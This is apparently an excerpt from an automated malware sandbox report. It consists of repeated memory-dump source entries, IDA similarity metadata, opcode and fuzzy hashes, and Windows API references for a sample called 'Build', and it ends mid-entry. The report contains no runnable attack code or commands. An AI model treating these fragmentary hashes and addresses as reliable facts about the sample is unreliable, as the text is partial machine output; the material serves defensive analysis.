                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                          • API String ID: 2593887523-3084827643
                                                                                          • Opcode ID: 5a4f996caa73ae65accf77a5ba145b1312c2f2fdc68befb7eeec78f843f2fcc4
                                                                                          • Instruction ID: b1f90510910cd5c8de1b50bc487c60cc55ca65d022cc4b0b30a117e6f7146c7a
                                                                                          • Opcode Fuzzy Hash: 5a4f996caa73ae65accf77a5ba145b1312c2f2fdc68befb7eeec78f843f2fcc4
                                                                                          • Instruction Fuzzy Hash: BFF0B43164131CBBCF036FA5DD02DAE7F69DB19710F004166FC056A1A1CE324A109BC1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc
                                                                                          • String ID: FlsAlloc
                                                                                          • API String ID: 2773662609-671089009
                                                                                          • Opcode ID: 33a5990eef0609cfb5e6920f9ac5d79dd715c90604d9f41f23532c1a8bfd2e98
                                                                                          • Instruction ID: 4434f0adaaeb26ff5cb5528c4bc720188d837f8f354341cab0df0500c39595a4
                                                                                          • Opcode Fuzzy Hash: 33a5990eef0609cfb5e6920f9ac5d79dd715c90604d9f41f23532c1a8bfd2e98
                                                                                          • Instruction Fuzzy Hash: DFE02B71642718A7CB077BA99C03DAEBB6DCB49720F4102AAFC05572C1CD726E01D7C6
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003810BA
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: 3To
                                                                                          • API String ID: 1269201914-245939750
                                                                                          • Opcode ID: 215c7eab97a4d95f185537a1b6a4c672863e16c3a025e66ff9a39ba2c84e5228
                                                                                          • Instruction ID: e87c55774569dcdf86f9df89b99d93b7192cf438db3a63e63d9dfed2f1f3a0ac
                                                                                          • Opcode Fuzzy Hash: 215c7eab97a4d95f185537a1b6a4c672863e16c3a025e66ff9a39ba2c84e5228
                                                                                          • Instruction Fuzzy Hash: 04B012E539C300BC331B3159EC02C37010CD0C0B14370CA6EF804C4480A4402CCD0332
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: cc3bd5cee3e301003eaed16beb8921599b821087d8627c9b06d72732d7840a07
                                                                                          • Instruction ID: a6f69e270ad831b3270ce5506a514c120f55455b80e4edb3f86d7d73e90971cf
                                                                                          • Opcode Fuzzy Hash: cc3bd5cee3e301003eaed16beb8921599b821087d8627c9b06d72732d7840a07
                                                                                          • Instruction Fuzzy Hash: 9CB09295299200AC328F61E99D12D36015CD0C0B1032084AAF805C4040A4821C0A0231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: e99a38884ad60ab615b439b6af8ea66865467564c2788966aca8c5fb6b40c49c
                                                                                          • Instruction ID: f2763d23c8e65f95d26f0ed36c8c8d67f886e8ba2d30a4466b13c81927c6fb0c
                                                                                          • Opcode Fuzzy Hash: e99a38884ad60ab615b439b6af8ea66865467564c2788966aca8c5fb6b40c49c
                                                                                          • Instruction Fuzzy Hash: B4B09296299200AC328F65E89C12D36015CD0C0B1032184AAF804C5040A4851C0D0231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: 238122a4a1ad289cb8175ac04a77fb2ae5f2b29775fa06ba139a2f3175893bc4
                                                                                          • Instruction ID: e6005b2708fc7578ad19d10fe13dfbd52dd95e274082f8affc246e4999d836c1
                                                                                          • Opcode Fuzzy Hash: 238122a4a1ad289cb8175ac04a77fb2ae5f2b29775fa06ba139a2f3175893bc4
                                                                                          • Instruction Fuzzy Hash: 99B092962A9300AC338F61E99C12D36015CD0C0B10321856AF404C4040A4851C490231
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: 56a65a407e7278f672d8b0bfe8d78bb371453a0b4613aa035fa61de7479b0265
                                                                                          • Instruction ID: 44a6e6c765bbb7f7215bdbd6382e76817de8f579035346dc784cab7a1638bb12
                                                                                          • Opcode Fuzzy Hash: 56a65a407e7278f672d8b0bfe8d78bb371453a0b4613aa035fa61de7479b0265
                                                                                          • Instruction Fuzzy Hash: 2BA002D5299701FC364F75E5DD16C76015CD4C4B557319959F445C444164C5184D5131
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: e031913750ac3039b6055b5d6d261bd5d6e80a26fca044668601b7373c0dcecc
                                                                                          • Instruction ID: 44a6e6c765bbb7f7215bdbd6382e76817de8f579035346dc784cab7a1638bb12
                                                                                          • Opcode Fuzzy Hash: e031913750ac3039b6055b5d6d261bd5d6e80a26fca044668601b7373c0dcecc
                                                                                          • Instruction Fuzzy Hash: 2BA002D5299701FC364F75E5DD16C76015CD4C4B557319959F445C444164C5184D5131
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00380A5D
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: FjuK8
                                                                                          • API String ID: 1269201914-2861630180
                                                                                          • Opcode ID: 1bf9e13f3cc6d753eb1b3caf01252cf320381967b2f66f08cc17c898cdf5e061
                                                                                          • Instruction ID: 9b7016f791ae10b75a04fcb9c006fec35ba107a382fe2bf5e5752b70ac145d1f
                                                                                          • Opcode Fuzzy Hash: 1bf9e13f3cc6d753eb1b3caf01252cf320381967b2f66f08cc17c898cdf5e061
                                                                                          • Instruction Fuzzy Hash: 7BA002D5295701BC364F75E5DD16D76025CD4C0B157319559F545D444174C5184D5131
                                                                                          APIs
                                                                                            • Part of subcall function 0038DE0B: GetOEMCP.KERNEL32(00000000,?,?,0038E094,?), ref: 0038DE36
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038E0D9,?,00000000), ref: 0038E2B4
                                                                                          • GetCPInfo.KERNEL32(00000000,0038E0D9,?,?,?,0038E0D9,?,00000000), ref: 0038E2C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: 7482d4400e1c20a7ebf9213cda692884eeccfebdbc4ca31a12c01b9653b32f96
                                                                                          • Instruction ID: 4d5a7fbee2c09980c03eb087d5b529d7a21b30e4c7275ee1dbfd75810c7ca577
                                                                                          • Opcode Fuzzy Hash: 7482d4400e1c20a7ebf9213cda692884eeccfebdbc4ca31a12c01b9653b32f96
                                                                                          • Instruction Fuzzy Hash: 9E513574A003059FDB23BF75C8816BBBBE9EF42300F1444EED0968B291D7B5A942DB90
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0036B43B,00000800,00000800,00000000,?,?,0036A31D,?), ref: 0036B5EB
                                                                                          • GetLastError.KERNEL32(?,?,0036A31D,?,?,?,?,?,?,?,?), ref: 0036B5FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: b0e4f1265ce5ff97a99b6ee780fa711c3f5d171fcdc26e7d30695751110e7a89
                                                                                          • Instruction ID: 95c11b905e4e86e3b2c2286a7c6a2d03ab398b16e3c627ac01e794f258832c57
                                                                                          • Opcode Fuzzy Hash: b0e4f1265ce5ff97a99b6ee780fa711c3f5d171fcdc26e7d30695751110e7a89
                                                                                          • Instruction Fuzzy Hash: 8441F2702083458BC7239F65C4849FAF3E9EF89360F108529E686C764ADBB5DCC08FA1
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0036B967,?,?,003687FD), ref: 0036B0A4
                                                                                          • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0036B967,?,?,003687FD), ref: 0036B0D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: b7e5656119df23adbf4557f86f56445594c10ac7146efe79a6bdc775b0d9502c
                                                                                          • Instruction ID: 1726f323f3767e0f2e42e67b698415ee1358e5ffe2255842a364686a38888eda
                                                                                          • Opcode Fuzzy Hash: b7e5656119df23adbf4557f86f56445594c10ac7146efe79a6bdc775b0d9502c
                                                                                          • Instruction Fuzzy Hash: C1218071504344AFE3319F24CC85BB7BBDCEB89320F018A1AF9A5C65D5D774A9888B62
                                                                                          APIs
                                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0036B7FC
                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 0036B8B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$BuffersFlushTime
                                                                                          • String ID:
                                                                                          • API String ID: 1392018926-0
                                                                                          • Opcode ID: 87ca94288979e158308bddd33be1f9cdda771c050e80aa82dcf33d57c19ddd44
                                                                                          • Instruction ID: 7fb919ed38d1343849efdda86a4bcec5049bb9f3eb75bfb6c9655c934d89baf5
                                                                                          • Opcode Fuzzy Hash: 87ca94288979e158308bddd33be1f9cdda771c050e80aa82dcf33d57c19ddd44
                                                                                          • Instruction Fuzzy Hash: B921E1312492829BC716DF65C892ABBFBECAF65304F09891DF4C5C7141D329E94CDB62
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3746244732-0
                                                                                          • Opcode ID: dcf07e7d206534aa5ac3e4139ef51e276c1a3798df0c94c027daff80302aa833
                                                                                          • Instruction ID: 73377bdcb07b51f1979e79e335a31dab35627c4c70fcb8029987c978561fa2ed
                                                                                          • Opcode Fuzzy Hash: dcf07e7d206534aa5ac3e4139ef51e276c1a3798df0c94c027daff80302aa833
                                                                                          • Instruction Fuzzy Hash: 41216A31900609EFCF22AF94C855AEEB7B6BF08300F15846DF445BB2A1CB395A51DB60
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx,00000000,?,0038613D,003C60C8,00000FA0), ref: 00386215
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0038621F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3013587201-0
                                                                                          • Opcode ID: c53886fa6d59ccf39422170ca7c26bb015de75a3c2950c93ee2f5e5305da6618
                                                                                          • Instruction ID: f0d0a662efc58e36366a24133122967006f265e3565bebf676464d64ee741222
